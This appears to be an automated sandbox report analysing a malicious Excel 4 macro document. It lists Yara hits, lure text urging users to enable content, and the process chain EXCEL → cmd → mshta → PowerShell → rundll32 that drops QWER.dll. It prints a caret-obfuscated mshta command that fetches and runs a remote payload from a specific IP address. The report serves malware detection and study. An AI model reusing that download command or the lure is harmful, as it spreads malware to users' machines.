Source: Yara match File source: 17.2.rundll32.exe.5a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.b50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2860000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.8f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary

Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 Previewing is not available for protected documents. 16 17 Yo
Source: Screenshot number: 4 Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 3
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 , , Previewing is not available for protected documents. 16 ::
Source: Screenshot number: 8 Screenshot OCR: protected documents. 16 :: You have to press :ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI 25 26 27 28 29
Source: 364453688149503140239183.xls Stream path 'Workbook' :
Source: 364453688149503140239183.xls.0.dr Stream path 'Workbook' :
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Source: 364453688149503140239183.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20C14 14_2_00B20C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10001 14_2_00B10001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18606 14_2_00B18606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1907F 14_2_00B1907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05E60 14_2_00B05E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1A666 14_2_00B1A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1AE6D 14_2_00B1AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02051 14_2_00B02051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02251 14_2_00B02251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10E53 14_2_00B10E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20056 14_2_00B20056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B01A56 14_2_00B01A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04C5D 14_2_00B04C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B16C49 14_2_00B16C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1044F 14_2_00B1044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B209B5 14_2_00B209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B081B7 14_2_00B081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B051BB 14_2_00B051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1C3A0 14_2_00B1C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B17BA6 14_2_00B17BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B213AD 14_2_00B213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1E395 14_2_00B1E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09B83 14_2_00B09B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14B87 14_2_00B14B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1D389 14_2_00B1D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B07FF2 14_2_00B07FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B059F2 14_2_00B059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0DFF3 14_2_00B0DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B16DF8 14_2_00B16DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B195FA 14_2_00B195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18BE3 14_2_00B18BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1DBEA 14_2_00B1DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B17DD5 14_2_00B17DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B02BD9 14_2_00B02BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B19BCF 14_2_00B19BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09DCF 14_2_00B09DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0E5CF 14_2_00B0E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B20F33 14_2_00B20F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B07735 14_2_00B07735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1473C 14_2_00B1473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B08B3D 14_2_00B08B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1BB23 14_2_00B1BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B06D24 14_2_00B06D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B09714 14_2_00B09714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14116 14_2_00B14116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B18519 14_2_00B18519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B10B19 14_2_00B10B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0BB7E 14_2_00B0BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05361 14_2_00B05361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B08969 14_2_00B08969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1176B 14_2_00B1176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B12550 14_2_00B12550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1CB5B 14_2_00B1CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0A55F 14_2_00B0A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B04346 14_2_00B04346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0CF47 14_2_00B0CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B05548 14_2_00B05548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B1894B 14_2_00B1894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0B74D 14_2_00B0B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BA03A 15_2_003BA03A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A323F 15_2_003A323F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A303C 15_2_003A303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C023A 15_2_003C023A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BBA31 15_2_003BBA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B9E30 15_2_003B9E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A7037 15_2_003A7037
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BE835 15_2_003BE835
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BB227 15_2_003BB227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0014 15_2_003C0014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A8411 15_2_003A8411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A3C16 15_2_003A3C16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003AF401 15_2_003AF401
Source: 4B14.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: 364453688149503140239183.xls Macro extractor: Sheet name: GODVIN
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write (8 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write (8 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE249 DeleteService, 12_2_002DE249
Source: 364453688149503140239183.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: 364453688149503140239183.xls OLE indicator, VBA macros: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@1/47
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 364453688149503140239183.xls OLE indicator, Workbook stream: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 364453688149503140239183.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k....................................}..v............0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k..... ..............................}..v....h.......0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....................................}..v............0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....x.l.............................}..v....8.......0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....................................}..v....P.......0...............................h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....(.l.............................}..v............0.................l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.................,k....E...............................}..v.....k......0...............x.l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.................,k....E...............................}..v............0...............x.l.............h............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.#.....:.......h............... (the dotted run is UTF-16LE console buffer text and decodes to the prompt "PS C:\Users\Albus\Documents> ", the interactive shell that the -noexit switch leaves open once the download stage has run)
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
